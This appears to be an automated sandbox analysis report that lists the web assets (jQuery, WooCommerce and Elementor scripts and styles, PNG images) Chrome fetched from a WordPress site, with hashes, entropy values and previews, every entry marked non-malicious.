                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):87553
                                                                                                          Entropy (8bit):5.262620498676155
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                          MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                          SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                          SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                          SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5126
                                                                                                          Entropy (8bit):7.957513975412577
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:6ccq7FABkCAEZRZ/cKyo0m6kPP1iqJjPDj20nUAXET6Yq582GpdPOJUn:6X2C5ZP/cKOhkPsqJjf582YPkUn
                                                                                                          MD5:F485FFB381BC13DE8CA39BE5AE12B10D
                                                                                                          SHA1:9DB60D69BB9D136DAB05D5AC35AE49F29CD0AE36
                                                                                                          SHA-256:8EFB6E853BEBFDC367BFBE43180AE7183478000C6BFF4C82C965B6A84C4088B2
                                                                                                          SHA-512:F61C31ACF070924F6BF7F45EEA0E52236111DEB695088B66AA6B04806507D3F578AD1B12F0F682E1FDE4D4B73B1CC96B6F8B0B29B73B595664B5A76524728DDE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.(.!..........m....|..K..(6[.h.Y.TSY'pW..%.cPbd.$'M.:35...[.7z5..E......w{..H.Y0...!..I..>....)..M.s....^.(l-..t.+7..&PBNY._.._j.K.^...`...uQK.<C.."..$...@,...#...~..c......{e.v.Mv..$...:(.s.jFm."6|<...6^..n\...o,f|.P.O...hZ........:.k........Dc#.r...fgd&phut..7S.9.....B..(g.....Qo6'b....^.[..j....!.L.5>.....Te;..F...Uv|.R...f..K...1.......*;....T..smr..AT....F%.c]UO..-K.....G...V..W.Lz..2#.Q..J....v....7....h.].f.........k.....[..c...LG..v..L^ ...R)....(......YY..;C.8.....w..:L..G...........d.=D.S..../....J....X.%.y l......U.S.s2..=.g.P.=..:..Jd..]...4e'?..r&w..Ca..2W.......p...C.~.. .d2."N..I.$Wir9,.I....d.9...(...0-.............H..._..1....%...y.sO.ecr.k.!.....k"..l.DJz.[...t..U...o|......5...T.....`;1.I..rw.;...R.9..#<@8..ED..h..J.=E.D.V&S..g..=;..7...f.9..l.m.....z)h.S....K.....t.S.7..(.(g......(.......fa.iC.p..0..`X.KJ.v.$=I...y.k{JY....|.j.A{......g..(.Ii.]..\U.......$P.nz5..z......~E...[..\_w....c..Tt.C..9a..M..x...i..W=R
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 7680 x 4321, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3409680
                                                                                                          Entropy (8bit):7.75623820947467
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:98304:QEuTL7o3ukyC91Q/BfGg3UATMHP/dSx/YtQBHyjeB4UZkAC9wHhukEy:T3lyC91MfGGTMHXdsZfB4gC9wHYk5
                                                                                                          MD5:DCDBC1199AAECA81C7F2B3FEEC3E0E2C
                                                                                                          SHA1:CD378A53262BB1FCB60D47BF9753AB5BF4BC6E75
                                                                                                          SHA-256:72D29B99579A6FA75CB867FA4F28799A78054F8DBE438FF8E5FE550F250D7565
                                                                                                          SHA-512:B73310C0D27BABFA1B879169AB7B606B1DF4A181ACA409C145472C2B05D69AF57AA13B35BCD85E4350783310F433B92D31D3835048C377AF1625C0FFA4BE1E9F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2024/09/Asset-7@4x.png
                                                                                                          Preview:.PNG........IHDR.............}..6....pHYs..,J..,J.wztM.. .IDATx...$;v,..Y.._K...u.M/.U...G."Kdgn..0..0.................................................................W..............k..b......#.^g}V.......oMO......Q~..:....\.....#A...5...3...x..z~.........E..._.?...._.....5..l...3...U...._T{...\...|...........~...<.:.s.....iz8..ws.O.p..x..............Y~..E....k...>.........K.KtmF{..oV..m.s..z=W...,.@....8.?`~.9....o..h.vy.....h.g}Q~.=...5....7.U.....N..C.>3... o.......8>Z~........Gh:Uw.....J{*....S..|.........5..?..........=.....du..${..~..{..K...|.px.?..[...#....`........Q.#..0..2~W/..'.U..uL....x...<./...O....0...7....TD2.#..........<...C>.>J{..#.w.?Tw..~.O..|...,........w.....>S^|.~...AO.....,.6.m..1.'...?.....> ......U....x..jx.}........>4.)^..&..7(.'....1..}r<.=..C...o..5......G.'4...M.}^/....).K..}.w.........."r>g..}W.n.Q..R.....q.W.:.yC......hMO......$5.!....@$?.W-_.?...W..(....T.y..e.g{.?\..2=......9...O..cu......8..J..j........79....:.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2935
                                                                                                          Entropy (8bit):4.174503977015458
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7v1If1Gl2CyoE7yrrVOiZDH25ByL0LuPoPBPHqPYnBu0dif0FWJOqrUIW:wW2CyoE7yPbZQQouQ5vqAn4ki2WBwIW
                                                                                                          MD5:5B2F6DA440BA208EECC15960E70D0B94
                                                                                                          SHA1:C9A817396AE1643141586206B0D320A8C7165C63
                                                                                                          SHA-256:97F0CACD19D339EFCC1A6B913F155C4002DF12FB9EA984D975BA87D481B2C67A
                                                                                                          SHA-512:66CA5C97A7383112F9D0D5CD89EE8DFC0937AF1235C269684A85F45C3A02035FAF38C3B91FED297810E37D6C333E883A00A44120B734861B9302EBD84112BEA9
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";.function woof_init_sliders() {. jQuery.each(jQuery('.woof_taxrange_slider'), function (index, input) {... try {. .. var slags = jQuery(input).data('slags').split(',');. var tax = jQuery(input).data('tax');.. var skin = jQuery(input).data('skin');. var current = String(jQuery(input).data('current')).split(',');. var from_index = 0, to_index = slags.length - 1;.. //***. if (current.length > 0 && slags.length > 0) {. jQuery.each(slags, function (index, v) {. if (v.toLowerCase() == current[0].toLowerCase()) {. from_index = index;. }. if (v.toLowerCase() == current[current.length - 1].toLowerCase()) {. to_index = index;. }. });. } else {. to_index = parseInt(jQuery(input).data('max'), 10) - 1;. }.. jQuery(inpu
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3235)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3236
                                                                                                          Entropy (8bit):5.1052025431203045
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:jJ/7zIQqjeNF3uFGPGFdMqmvYe8SMI7l/6k6Y5BbOoFTGvK2:jJTEBj8F3lPGFGvYWvx/dNDF4
                                                                                                          MD5:DBE4B3628220901277C0C4234475E5CB
                                                                                                          SHA1:C17291130BC11A7F39CE70FE869BF82946E7BE8B
                                                                                                          SHA-256:10A2CF3D16091FBC89CC987160B62093515CD31F0762A751775999311C7313F4
                                                                                                          SHA-512:5CB99FFF539C035311BC1D4C6188600F48FE8733034BA4C67C8AFCA0781E4A6CAD38FD3523A85EB2F936D21DC9A94D3653733ECFFE87881B502C447E9303E867
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.6.4
                                                                                                          Preview:!function(t){var o=function(o,s){var e,i,r=!1,n=!1,a=!1,c={},f={to:"top",offset:0,effectsOffset:0,parent:!1,classes:{sticky:"sticky",stickyActive:"sticky-active",stickyEffects:"sticky-effects",spacer:"sticky-spacer"}},p=function(t,o,s){var e={},i=t[0].style;s.forEach(function(t){e[t]=void 0!==i[t]?i[t]:""}),t.data("css-backup-"+o,e)},l=function(t,o){return t.data("css-backup-"+o)},m=function(){p(e,"unsticky",["position","width","margin-top","margin-bottom","top","bottom"]);var t={position:"fixed",width:u(e,"width"),marginTop:0,marginBottom:0};t[i.to]=i.offset,t["top"===i.to?"bottom":"top"]="",e.css(t).addClass(i.classes.stickyActive)},d=function(){e.css(l(e,"unsticky")).removeClass(i.classes.stickyActive)},u=function(t,o,s){var e=getComputedStyle(t[0]),i=parseFloat(e[o]),r="height"===o?["top","bottom"]:["left","right"],n=[];return"border-box"!==e.boxSizing&&n.push("border","padding"),s&&n.push("margin"),n.forEach(function(t){r.forEach(function(o){i+=parseFloat(e[t+"-"+o])})}),i},y=func
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 3236 x 1388, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):80326
                                                                                                          Entropy (8bit):7.390901813388901
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:DZsgLIxfTtNJcXhR9JXoM6p86lFsbUA7mv+1CRiZ4rp:dsgLgfTnJcXDotDDAqm+Rrp
                                                                                                          MD5:98998B57EB1F0DE182C02C2E75EFAF64
                                                                                                          SHA1:F70C279E5D402D390386C6176EE9E565025204F7
                                                                                                          SHA-256:D5AA63FF567C73262121562408F3EFE1BC90EEB71EE59AE995452B82C7709B86
                                                                                                          SHA-512:A915F90F3F516631B8EAF7227DD56C6C0CBD9B3CCE40424D8AFA492D8A22E07C22555F6C956FB8DB151C33F0669E58AFF65DE2B765A829D5890303721D8B9868
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.......l......,......bKGD..............pHYs...#...#.x.?v....tIME..... q.T.. .IDATx....q,G.....z.<......`...@...,...X ..Jx.X ..E[p.0...wH...;.../bc#...sNe..,...............U.P..............!..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (952)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):475534
                                                                                                          Entropy (8bit):4.961773395716967
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:AboadCdWNsgMNfWZK9TKjUM5LhSQR2eaISVEFl9u07Osgl:3
                                                                                                          MD5:CAF03677E4E61D85CAA208050A2E70F5
                                                                                                          SHA1:BDA5CC1BC9582E7639EA9BEFDDD746F31AC36383
                                                                                                          SHA-256:0807F0529B0071D495CC7030F2AB8786FD60DF02BCB0D0FA7E84AC62048D4C8A
                                                                                                          SHA-512:E62031EF130C3705BA19E558CDA0A22A7DEFB4DF93BD1D770EB73E30BFD8D6039A28291541E48D934AD139253E38E8C1AAFB4189D412952FDFE86FCFC6894B0A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/css/theme.css?ver=1.0.8
                                                                                                          Preview:html {. font-size: 1rem;.}../* WordPress Core */.body {. position: relative;. color: #6d6d6d;. font-size: 15px;. line-height: 1.5;. /* Text meant only for screen readers. */.}.body .alignnone {. margin: 5px 20px 20px 0;.}.body .aligncenter, body div.aligncenter {. display: block;. margin: 5px auto 5px auto;.}.body .alignright {. float: right;. margin: 5px 0 20px 20px;. clear: right;.}.body .alignleft {. float: left;. margin: 5px 20px 20px 0;. clear: left;.}.body .wp-caption {. background: #fff;. max-width: 100%;. /* Image does not overflow the content area */. text-align: center;. margin-bottom: 20px;.}.body .wp-caption.alignnone {. margin: 5px 20px 20px 0;.}.body .wp-caption.alignleft {. margin: 5px 20px 20px 0;.}.body .wp-caption.alignright {. margin: 5px 0 20px 20px;.}.body .wp-caption img {. border: 0 none;. height: auto;. margin: 0;. max-width: 100%;. padding: 0;. width: auto;.}.body .wp-caption p.wp-caption-text {. font-size: 11px;. line-height: 17p
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (15752)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18726
                                                                                                          Entropy (8bit):4.756109283632968
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:WTbvzWuPTb9Uh3o//bEPjXgA2k1efAJmpr:WX6U9Uh3o//YrXgAGfACr
                                                                                                          MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                                                          SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                                                          SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                                                          SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65493)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):441967
                                                                                                          Entropy (8bit):4.7268779047052965
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:AXptFzSq0xMhBz0h/cNzyJ2MJGhsAsochVenejtUdhvNlC6lREQl++iG597BOe7Y:AXptTsrS4N7qpG/
                                                                                                          MD5:8CFDBF40476C8BB5542E666C770D16CA
                                                                                                          SHA1:34E1EC7A16C2E08CCCD149430EBA9B39614AB1E0
                                                                                                          SHA-256:B32F658F5EA9C08F4D3F0D32C2966FCCE6A82914075E507F309C6C6A46EF8FB5
                                                                                                          SHA-512:06056712DB3D990E91355D3A70C9E6345A15AB85BC5B965AE2ACF451A8A09E31FD94968E21839E1B1EF5F7A0E134D0522E2D4A7981E7D38E1B85C5441B3BD7A6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.6.4
                                                                                                          Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */.@charset "UTF-8";.elementor-bg-transform .elementor-bg{will-change:transform}.elementor-bg-transform-zoom-in:hover .elementor-bg,.elementor-bg-transform-zoom-out .elementor-bg{-webkit-transform:scale(1.2);-ms-transform:scale(1.2);transform:scale(1.2)}.elementor-bg-transform-zoom-out:hover .elementor-bg{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}.elementor-bg-transform-move-left .elementor-bg{-webkit-transform:scale(1.2) translateX(8%);-ms-transform:scale(1.2) translateX(8%);transform:scale(1.2) translateX(8%)}.elementor-bg-transform-move-left:hover .elementor-bg,.elementor-bg-transform-move-right .elementor-bg{-webkit-transform:scale(1.2) translateX(-8%);-ms-transform:scale(1.2) translateX(-8%);transform:scale(1.2) translateX(-8%)}.elementor-bg-transform-move-right:hover .elementor-bg{-webkit-transform:scale(1.2) translateX(8%);-ms-transform:scale(1.2) translateX(8%);transform:scale(1.2) translateX(8%)}.elementor-bg-t
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):682
                                                                                                          Entropy (8bit):4.708656090317137
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:ASpwO3X8b+1gM2YM5144jv9ezJ/njfgMAFaVJNA86FOlBTDegXov:bCeJg5qT/npvNQF0TCgi
                                                                                                          MD5:DF70E530BAF673252340B1B3D52C35B3
                                                                                                          SHA1:939E94E4CA1C36E63A4E72D8F7593CDD484E2FBF
                                                                                                          SHA-256:8A7849E5A97F3A20743A6A00216377AAEED742AD0F1F651677A16F0EF83D7BC8
                                                                                                          SHA-512:72CC0E276FD6F6106AABDA034036BAA229A30DE8E50DF4D864ED83C360ECBBA7F52D6FD4E4D4FE400231466C2BB5A2A6E9182FEE07CF61AC308F1F922297BC88
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/css/html_types/image.css?ver=3.3.0
                                                                                                          Preview:.woof_sid_auto_shortcode .woof_container_image{ . .}...woof_sid_auto_shortcode .woof_container_inner_image{. padding: 9px;. background: #fff;. border-radius: 7px;.}..ul.woof_list_image{..}..ul.woof_list_image li {. display: inline-block;. float: none !important;. margin: 0 0 0 0 !important;. padding: 0 !important;.}...woof_image_term {. display: block; .}...woof_image_term.checked, .woof_image_term:hover {. border-color: #292f38 !important;.}...woof_image_checked {. width: 25px;. height: 25px;. background-color: red;. position: absolute;. z-index: 999;. display: none;.}..woof_image_text_term{. text-align: center;.}.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3016)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3300
                                                                                                          Entropy (8bit):5.15422255971796
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:X4OnB3aAn7JHj8+woEJXkjQQC0GCduGGC/zqrbCb:X4OB3rpj8+wlOGCIGGCmrbU
                                                                                                          MD5:135916F0FF0720B4C5E5FD5B43ACD167
                                                                                                          SHA1:0963226836755C1D25EC786A52578A1B93519A6C
                                                                                                          SHA-256:108EABA9F7689F620824BE11EF49B4131611EAE4BEEE2E116FCEC0799117297B
                                                                                                          SHA-512:17F06D215AEE3F4D2781E7F0654B39BE1047FC2AA3718919146EEBBF58EF8FC4BC95B68747D4A3732110C756AAA367F5CC26258DA86CF537F21CEEB8C70881C8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver=0.4.2
                                                                                                          Preview:/*!. * accounting.js v0.4.2. * Copyright 2014 Open Exchange Rates. *. * Freely distributable under the MIT license.. * Portions of accounting.js are inspired or borrowed from underscore.js. *. * Full details and documentation:. * http://openexchangerates.github.io/accounting.js/. */.!function(n){var f={version:"0.4.1",settings:{currency:{symbol:"$",format:"%s%v",decimal:".",thousand:",",precision:2,grouping:3},number:{precision:0,grouping:3,thousand:",",decimal:"."}}},i=Array.prototype.map,r=Array.isArray,e=Object.prototype.toString;function p(n){return""===n||n&&n.charCodeAt&&n.substr}function l(n){return r?r(n):"[object Array]"===e.call(n)}function m(n){return n&&"[object Object]"===e.call(n)}function d(n,r){for(var e in n=n||{},r=r||{})r.hasOwnProperty(e)&&null==n[e]&&(n[e]=r[e]);return n}function g(n,r,e){var t,o,a=[];if(!n)return a;if(i&&n.map===i)return n.map(r,e);for(t=0,o=n.length;t<o;t++)a[t]=r.call(e,n[t],t,n);return a}function h(n,r){return n=Math.round(Math.abs(n)),isNaN(n)
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18160
                                                                                                          Entropy (8bit):7.9507935414647015
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:E6bVK9GIzUQWsZdSawiqS61S3z+Ai3Azy1tL62pW1l0Z86vjNPTN:E6pLIAw2aFqSWS3z+AMZ3k/6vhN
                                                                                                          MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                                                          SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                                                          SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                                                          SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (692)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):880
                                                                                                          Entropy (8bit):5.14196063083674
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:NhCf1NhbmSH4J4VLHuHlz1xZ0oi+UEP3p:NhCfrsSHCyIlp0odUEvp
                                                                                                          MD5:B045121A36D5EE0879462864E20EDF9D
                                                                                                          SHA1:D0E40DEFA674F372E31AAE81AF0742E1E72816A8
                                                                                                          SHA-256:2A8CFEC8C79789EE642BF0021FB2B00D5B5CDB2AB9CD2B81F325CE4037481322
                                                                                                          SHA-512:C746EA63FD093B985A962E520B8CD52F36D863DA92D064223315A174CD69F802F427C324C7584C6B12A9A9D32DDE3CDDDD6D9CF964F2EDF8F3AB1E069ED07095
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.13.3
                                                                                                          Preview:/*!. * jQuery UI Effects Blind 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(s){"use strict";return s.effects.define("blind","hide",function(e,t){var i={up:["bottom","top"],vertical:["bottom","top"],down:["top","bottom"],left:["right","left"],horizontal:["right","left"],right:["left","right"]},o=s(this),n=e.direction||"up",c=o.cssClip(),f={clip:s.extend({},c)},r=s.effects.createPlaceholder(o);f.clip[i[n][0]]=f.clip[i[n][1]],"show"===e.mode&&(o.cssClip(f.clip),r&&r.css(s.effects.clipToBox(f)),f.clip=c),r&&r.animate(s.effects.clipToBox(f),e.duration,e.easing),o.animate(f,{queue:!1,duration:e.duration,easing:e.easing,complete:t})})});
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4921)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4960
                                                                                                          Entropy (8bit):5.388907220723694
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:B1N6AUjqn93zCpxYf8oqallarNVwbVLXkqfjQezovOP8S2:TN6j493GPRjNwdXkymOUS2
                                                                                                          MD5:E0B0728EF9A032F266A452E8756EED80
                                                                                                          SHA1:32092AD198ED2496B3DC52A23E8C7C1091B06B84
                                                                                                          SHA-256:9D02623E246A2E8299B30DA9FFA8AADD8B53CD63DB56A0F1237BE26244D05638
                                                                                                          SHA-512:0E9A0BB10DBBA6FBE02F4A265373896DA710A2B29B67AAA4A4A66ACA1DBC89011B073F60BBD4DB08532A738CDDEDD0C3797A1B70895F00AD9142CA5478A278DB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! elementor - v3.6.1 - 23-03-2022 */.(()=>{"use strict";var e,r,_,t,i,a={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,t,i)=>{if(!_){var a=1/0;for(u=0;u<e.length;u++){for(var[_,t,i]=e[u],n=!0,c=0;c<_.length;c++)(!1&i||a>=i)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[c])))?_.splice(c--,1):(n=!1,i<a&&(a=i));if(n){e.splice(u--,1);var o=t();void 0!==o&&(r=o)}}return r}i=i||0;for(var u=e.length;u>0&&e[u-1][2]>i;u--)e[u]=e[u-1];e[u]=[_,t,i]},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(e,t){if(1&t&&(e=this(e)),8&t)return e;if("object"==typeof e&&e){if(4&t&&e.__esModule)return e;if(16&t&&"function"==typeof e.then)return e}var i=Object.create(null);__webpack_require__.r(i);var a={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;"object"==typeof
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (15619)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15810
                                                                                                          Entropy (8bit):5.096135394077839
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:gyRm7JRre+5fXVP5NXX+QUN3Gfp4cry7F:gys7be+5BXX+Ary7F
                                                                                                          MD5:1483B7BED8BACD5317F83F97CCE18DB2
                                                                                                          SHA1:E309DF3559FA1852BCC3606C402A67314E4A35DF
                                                                                                          SHA-256:DAD394F2FB64582D2F94F27E16B6A68B3FD63AA58E8A695D115E2ED9C7F84BC3
                                                                                                          SHA-512:59BA0A4D85D247E5C57748AB05C781340A0B9CD23D91494AA83BEFCB3C87A48EEEBF3F2C17E61D1FD9DA3F5F5E1B7DE67E9CCE1290EADA23AF2A052BBC1328AD
                                                                                                          Malicious:false
                                                                                                          Reputation:low
